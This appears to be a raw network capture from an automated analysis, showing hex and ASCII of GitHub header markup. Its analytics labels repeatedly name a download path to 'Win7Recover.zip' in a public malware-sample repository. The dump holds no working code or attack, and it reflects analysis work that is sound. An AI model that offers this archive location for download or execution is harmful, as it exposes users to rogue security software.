                                                                                                                                                            2022-09-29 12:45:34 UTC38015INData Raw: 30 32 20 33 2e 37 35 76 38 2e 35 63 30 20 2e 39 36 36 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 20 31 2e 37 35 68 38 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 20 31 32 2e 32 35 76 2d 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 31 2e 35 20 30 76 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 68 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 76 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 30 2d 31 2e 35 68 2d 33 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 0a 0a 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: 02 3.75v8.5c0 .966.784 1.75 1.75 1.75h8.5A1.75 1.75 0 0014 12.25v-3.5a.75.75 0 00-1.5 0v3.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25v-8.5a.25.25 0 01.25-.25h3.5a.75.75 0 000-1.5h-3.5z"></path></svg></a></li> </ul> </div></li>
                                                                                                                                                            2022-09-29 12:45:34 UTC38016INData Raw: 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 45 6e 74 65 72 70 72 69 73 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26
                                                                                                                                                            Data Ascii: own-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to Enterprise&quot;,&quot;label&quot;:&
                                                                                                                                                            2022-09-29 12:45:34 UTC38018INData Raw: 6f 6e 65 20 66 35 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 70 62 2d 33 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 68 34 20 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 6d 79 2d 31 22 3e 42 79 20 53 6f 6c 75 74 69 6f 6e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74
                                                                                                                                                            Data Ascii: one f5 border-bottom pb-3 mb-3"> <li class="h4 color-fg-default my-1">By Solution</li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analyt
                                                                                                                                                            2022-09-29 12:45:34 UTC38019INData Raw: 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 44 65 76 4f 70 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63
                                                                                                                                                            Data Ascii: lank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to DevOps&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_c
                                                                                                                                                            2022-09-29 12:45:34 UTC38020INData Raw: 2f 72 65 73 6f 75 72 63 65 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 64 65 76 6f 70 73 2f 66 75 6e 64 61 6d 65 6e 74 61 6c 73 2f 64 65 76 73 65 63 6f 70 73 2f 22 3e 0a 20 20 20 20 20 20 44 65 76 53 65 63 4f 70 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d
                                                                                                                                                            Data Ascii: /resources.github.com/devops/fundamentals/devsecops/"> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-
                                                                                                                                                            2022-09-29 12:45:34 UTC38022INData Raw: 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 52 65 73 6f 75 72 63 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d
                                                                                                                                                            Data Ascii: position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to Resources&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/M
                                                                                                                                                            2022-09-29 12:45:34 UTC38023INData Raw: 74 65 72 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 6a 73 2d 64 65 74 61 69 6c 73 2d 74 61 72 67 65 74 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 4f 70 65 6e 20 53 6f 75 72 63 65 0a 20 20 20 20 20 20 3c 73 76 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 48 65 61 64 65 72
                                                                                                                                                            Data Ascii: ter flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down Header
                                                                                                                                                            2022-09-29 12:45:34 UTC38024INData Raw: 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 4f 70 65 6e 20 53 6f 75 72 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75
                                                                                                                                                            Data Ascii: <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Open Source&quot;,&quot;action&qu
                                                                                                                                                            2022-09-29 12:45:34 UTC38026INData Raw: 6f 75 74 29 2c 20 4f 70 65 6e 20 53 6f 75 72 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 54 72 65 6e 64 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 54 72 65 6e 64 69 6e 67 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 74 72 65 6e 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 54 72 65 6e 64 69 6e 67 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20
                                                                                                                                                            Data Ascii: out), Open Source&quot;,&quot;action&quot;:&quot;click to go to Trending&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Trending;&quot;}" href="/trending"> Trending </a></li>
                                                                                                                                                            2022-09-29 12:45:34 UTC38027INData Raw: 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 78 2d 33 20 70 78 2d 6c 67 2d 30 20 6d 62 2d 33 20 6d 62 2d 6c 67 2d 30 20 74 65 78 74 2d 63 65 6e 74 65 72 20 74 65 78 74 2d 6c 67 2d 6c 65 66 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 6c 67 2d 66 6c 65 78 20 6d 69 6e 2d 77 69 64 74 68 2d 30 20 6d 62 2d 32 20 6d 62 2d 6c 67 2d 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 0a 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 73 65 61 72 63 68 20 66 6c 65 78 2d 61 75 74 6f 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 6a 73 2d 73 69 74
                                                                                                                                                            Data Ascii: </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-sit
                                                                                                                                                            2022-09-29 12:45:34 UTC38028INData Raw: 20 20 72 6f 6c 65 3d 22 63 6f 6d 62 6f 62 6f 78 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 22 6c 69 73 74 62 6f 78 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6c 69 73 74 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 6a 75 6d 70 2d 74 6f 2d 72 65 73 75 6c 74 73 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 3d 22 2f 5f 67 72 61 70 68 71 6c 2f 47 65 74 53 75 67 67 65 73 74 65 64 4e
                                                                                                                                                            Data Ascii: role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedN
                                                                                                                                                            2022-09-29 12:45:34 UTC38030INData Raw: 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 70 61 74 68 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6f 70 65 6e 20 70 2d 32 22 20 68 72 65 66 3d 22 22 20 64 61 74 61 2d 69 74 65 6d 2d 74 79 70 65 3d 22 73 75 67 67 65 73 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72 2d 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 64 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 52 65 70 6f 73 69 74 6f 72
                                                                                                                                                            Data Ascii: jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="suggestion"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repositor
                                                                                                                                                            2022-09-29 12:45:34 UTC38031INData Raw: 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2d 2e 37 35 7a 6d 2d 38 2e 32 35 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 35 20 30 76 35 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 35 2e 35 7a 4d 38 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 33 2e 35 41 2e 37 35 2e 37 35 20 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d
                                                                                                                                                            Data Ascii: 5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version=
                                                                                                                                                            2022-09-29 12:45:34 UTC38032INData Raw: 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 64 2d 6f 6e 2d 6e 61 76 2d 66 6f 63 75 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 6a 75 6d 70 22 3e 0a 20 20 20 20 20 20 4a 75 6d 70 20 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 3c 2f 75 6c 3e 0a 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 20 6a 73 2d
                                                                                                                                                            Data Ascii: "border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle"></span> </div> </a></li></ul><ul class="d-none js-
                                                                                                                                                            2022-09-29 12:45:34 UTC38034INData Raw: 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 37 32 20 31 2e 30 35 41 32 2e 34 39 35 20 32 2e 34 39 35 20 30 20 30 31 32 20 31 31 2e 35 76 2d 39 7a 6d 31 30 2e 35 2d 31 56 39 68 2d 38 63 2d 2e 33 35 36 20 30 2d 2e 36 39 34 2e 30 37 34 2d 31 20 2e 32 30 38 56 32 2e 35 61 31 20 31 20 30 20 30 31 31 2d 31 68 38 7a 4d 35 20 31 32 2e 32 35 76 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2e 32 6c 31 2e 34 35 2d 31 2e 30 38 37 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 33 20 30 4c 38 2e 36 20 31 35 2e 37 61 2e 32 35 2e 32 35 20 30 20 30 30
                                                                                                                                                            Data Ascii: 12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00
                                                                                                                                                            2022-09-29 12:45:34 UTC38035INData Raw: 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 61 76 61 74 61 72 20 64 2d 6e 6f 6e 65 22 20 61 6c 74 3d 22 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 61 6d 22 20 73 72 63 3d 22 22 20 77 69 64 74 68 3d 22 32 38 22 20 68 65 69 67 68 74 3d 22 32 38 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f
                                                                                                                                                            Data Ascii: .75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestio
                                                                                                                                                            2022-09-29 12:45:34 UTC38036INData Raw: 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6f 70 65 6e 20 70 2d 32 22 20 68 72 65 66 3d 22 22 20 64 61 74 61 2d 69 74 65 6d 2d 74 79 70 65 3d 22 6f 77 6e 65 72 5f 73 63 6f 70 65 64 5f 73 65 61 72 63 68 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72 2d 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 64 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36
                                                                                                                                                            Data Ascii: s-navigation-open p-2" href="" data-item-type="owner_scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16
                                                                                                                                                            2022-09-29 12:45:34 UTC38038INData Raw: 2e 35 20 30 76 35 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 35 2e 35 7a 4d 38 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 33 2e 35 41 2e 37 35 2e 37 35 20 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20
                                                                                                                                                            Data Ascii: .5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true"
                                                                                                                                                            2022-09-29 12:45:34 UTC38039INData Raw: 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 64 2d 6f 6e 2d 6e 61 76 2d 66 6f 63 75 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 6a 75 6d 70 22 3e 0a 20 20 20 20 20 20 4a 75 6d 70 20 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69
                                                                                                                                                            Data Ascii: e px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle"></span> </div> </a></li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigati
